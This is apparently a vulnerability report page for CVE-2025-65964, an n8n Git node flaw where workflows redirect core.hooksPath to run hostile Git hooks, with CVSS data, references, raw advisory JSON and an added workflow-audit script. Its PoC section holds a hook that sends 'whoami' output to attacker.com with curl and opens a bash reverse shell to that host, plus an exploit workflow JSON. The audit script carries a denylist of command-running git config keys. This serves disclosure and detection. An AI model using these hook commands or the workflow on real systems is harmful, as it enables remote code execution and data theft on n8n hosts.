Security Vulnerability Report
CVE-2025-65964 CVSS 8.8 HIGH

CVE-2025-65964

Published: 2025-12-09 00:15:49
Last Modified: 2026-01-02 21:11:00

Description

n8n is an open source workflow automation platform. Versions 0.123.1 through 1.119.1 do not have adequate protections to prevent RCE through Git hooks. The Add Config operation of the Git node allows workflows to set arbitrary Git configuration values, including core.hooksPath, which can point to a malicious Git hook that executes arbitrary commands on the n8n host during subsequent Git operations. Exploitation requires the ability to create or modify an n8n workflow using the Git node. This issue is fixed in version 1.119.2. Workarounds include excluding the Git Node (see the n8n documentation on blocking nodes, linked under References) and avoiding cloning or interacting with untrusted repositories using the Git Node.

Note that core.hooksPath is a filesystem path on the n8n host, not a remote location: the hook scripts have to be present there first, for example inside an untrusted repository that the same node cloned, and each hook fires only on the Git operation it is named for (pre-commit on commit, post-checkout on clone or checkout, pre-push on push). Because the node runs with the privileges of the n8n process, so does the hook.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 (secondary metric)
9.4 CRITICAL - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Weakness
CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:* - VULNERABLE
n8n (Node.js) 0.123.1 up to and including 1.119.1 (versionStartIncluding 0.123.1, versionEndExcluding 1.119.2); first fixed release 1.119.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-65964 PoC - Malicious Git hook via the n8n Git node.
// Shows how a workflow that can run the Git node's "Add Config" operation
// redirects core.hooksPath to a directory the attacker controls on the n8n host.

// Step 1: Hook script that must end up on the n8n host's filesystem.
// core.hooksPath is a local path, not a URL; a practical way to land the script
// is to commit it to an attacker-controlled repository that the workflow clones.
// The file name selects the Git operation that triggers it: pre-commit/post-commit
// fire on commit, post-checkout on clone or checkout, pre-push on push.
const maliciousHook = `#!/bin/bash
# Malicious pre-commit hook: exfiltrates the user the hook runs as, then opens a reverse shell
curl "https://attacker.com/exfil?data=$(whoami)"
/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1
`;

// Step 2: Workflow JSON that abuses the Git node's Add Config operation.
// key/value are the user-supplied config entry and repositoryPath the checkout
// the node operates on; confirm the parameter names against the Git node
// definition of the n8n version under test.
const exploitWorkflow = {
  name: 'CVE-2025-65964 Exploit',
  nodes: [
    {
      parameters: {
        operation: 'addConfig',
        repositoryPath: '/home/node/repos/untrusted',
        key: 'core.hooksPath',
        value: '/home/node/repos/untrusted/hooks',
      },
      name: 'Git Node',
      type: 'n8n-nodes-base.git',
    },
  ],
  connections: {},
};

// Step 3: The next Git operation in that repository that invokes the hook
// (e.g. a Commit operation for a pre-commit hook) runs it as the n8n process user.
console.log('PoC for CVE-2025-65964');
console.log('Exploit: Set core.hooksPath to an attacker-controlled directory on the n8n host');
console.log('Impact: Arbitrary code execution on the n8n server during subsequent Git operations');
console.log(JSON.stringify(exploitWorkflow, null, 2));
console.log(maliciousHook);
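
The description and PoC above show the attack; what a defender needs is the matching check. The following audit script is an added example and is not part of this advisory or of n8n's own code. It takes exported n8n workflow JSON plus the running n8n version and reports Git nodes whose Add Config operation sets a config key that makes git execute an external program, flagging keys written as n8n expressions (values starting with "=") for manual review since they cannot be judged statically. Assumptions: the flat parameters.key / parameters.value layout and the node type n8n-nodes-base.git are taken to match the Git node's definition; core.hooksPath is the only key the advisory names, and the other keys in the denylist are this example's own extension; the sample workflows are constructed, not real exports.

```python
import json
import re

# Affected range from the advisory: 0.123.1 <= version < 1.119.2 (fixed in 1.119.2).
FIRST_AFFECTED = (0, 123, 1)
FIRST_FIXED = (1, 119, 2)

# core.hooksPath is the key the advisory names. The rest is an assumption of this
# example: further git config keys that make git run an external program, which a
# hardened Add Config denylist would want to reject as well.
DANGEROUS_GIT_KEYS = {
    "core.hookspath",
    "core.sshcommand",
    "core.gitproxy",
    "core.fsmonitor",
    "core.pager",
    "core.editor",
    "core.askpass",
    "diff.external",
    "credential.helper",
    "uploadpack.packobjectshook",
}

GIT_NODE_TYPE = "n8n-nodes-base.git"  # assumed node type name of the n8n Git node


def parse_version(version):
    """Parse 'MAJOR.MINOR.PATCH' (optional leading 'v', optional pre-release suffix)."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?", version.strip())
    if not m:
        raise ValueError(f"unrecognised n8n version: {version!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable_version(version):
    return FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED


def is_dangerous_key(key):
    """Section and variable names in git config are case-insensitive, so compare lower-cased.
    alias.* entries can run arbitrary shell via '!cmd', so the whole section is flagged."""
    k = key.strip().lower()
    return k in DANGEROUS_GIT_KEYS or k.startswith("alias.")


def find_risky_git_nodes(workflow):
    """One finding per Git node whose Add Config operation sets a dangerous key.
    Keys given as n8n expressions ('=...') cannot be judged statically and are flagged for review."""
    findings = []
    for node in workflow.get("nodes", []):
        if node.get("type") != GIT_NODE_TYPE:
            continue
        params = node.get("parameters", {})
        if params.get("operation") != "addConfig":
            continue
        key = str(params.get("key", ""))
        if key.startswith("="):
            reason = "dynamic key (n8n expression), review manually"
        elif is_dangerous_key(key):
            reason = f"sets {key}, which makes git execute attacker-chosen code"
        else:
            continue
        findings.append({
            "workflow": workflow.get("name"),
            "node": node.get("name"),
            "key": key,
            "value": params.get("value"),
            "reason": reason,
        })
    return findings


def audit(workflows, n8n_version):
    """Combine the version check with a scan of every exported workflow."""
    findings = [f for wf in workflows for f in find_risky_git_nodes(wf)]
    vulnerable = is_vulnerable_version(n8n_version)
    return {
        "n8n_version": n8n_version,
        "version_vulnerable": vulnerable,
        "findings": findings,
        "exposed": vulnerable and bool(findings),
    }


# Constructed sample export (not real n8n data): one benign Add Config, one that
# redirects hooks using a mixed-case key, and one whose key is an expression.
SAMPLE_WORKFLOWS = json.loads("""
[
  {
    "name": "Nightly backup",
    "nodes": [
      {"name": "HTTP", "type": "n8n-nodes-base.httpRequest", "parameters": {"url": "https://example.invalid"}},
      {"name": "Git config email", "type": "n8n-nodes-base.git",
       "parameters": {"operation": "addConfig", "key": "user.email", "value": "ci@example.invalid"}},
      {"name": "Git hooks", "type": "n8n-nodes-base.git",
       "parameters": {"operation": "addConfig", "key": "Core.HooksPath", "value": "/home/node/untrusted/hooks"}},
      {"name": "Git commit", "type": "n8n-nodes-base.git",
       "parameters": {"operation": "commit", "message": "backup"}}
    ]
  },
  {
    "name": "Dynamic",
    "nodes": [
      {"name": "Git dyn", "type": "n8n-nodes-base.git",
       "parameters": {"operation": "addConfig", "key": "={{ $json.key }}", "value": "={{ $json.value }}"}}
    ]
  }
]
""")

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_WORKFLOWS, "1.119.1"), indent=2))
```

Run it against a directory of workflow exports by loading each file into the list passed to audit(); findings on a patched instance still deserve review, since a workflow that sets core.hooksPath has no legitimate reason to exist even after the upgrade.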

References

https://github.com/n8n-io/n8n/commit/d5a1171f95f75def5c3ac577707ab913e22aef04 - Patch
https://github.com/n8n-io/n8n/releases/tag/n8n%401.119.2 - Release Notes
https://github.com/n8n-io/n8n/security/advisories/GHSA-wpqc-h9wp-chmq - Exploit, Vendor Advisory
https://n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes - Third Party Advisory (blocking nodes documentation)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65964", "sourceIdentifier": "[email protected]", "published": "2025-12-09T00:15:48.800", "lastModified": "2026-01-02T21:10:59.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Versions 0.123.1 through 1.119.1 do not have adequate protections to prevent RCE through the project's pre-commit hooks. The Add Config operation allows workflows to set arbitrary Git configuration values, including core.hooksPath, which can point to a malicious Git hook that executes arbitrary commands on the n8n host during subsequent Git operations. Exploitation requires the ability to create or modify an n8n workflow using the Git node. This issue is fixed in version 1.119.2. Workarounds include excluding the Git Node (Docs) and avoiding cloning or interacting with untrusted repositories using the Git Node."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.123.1", "versionEndExcluding": "1.119.2", "matchCriteriaId": "6D50DACE-8293-4E05-974C-6F971563D06F"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/commit/d5a1171f95f75def5c3ac577707ab913e22aef04", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/n8n-io/n8n/releases/tag/n8n%401.119.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-wpqc-h9wp-chmq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}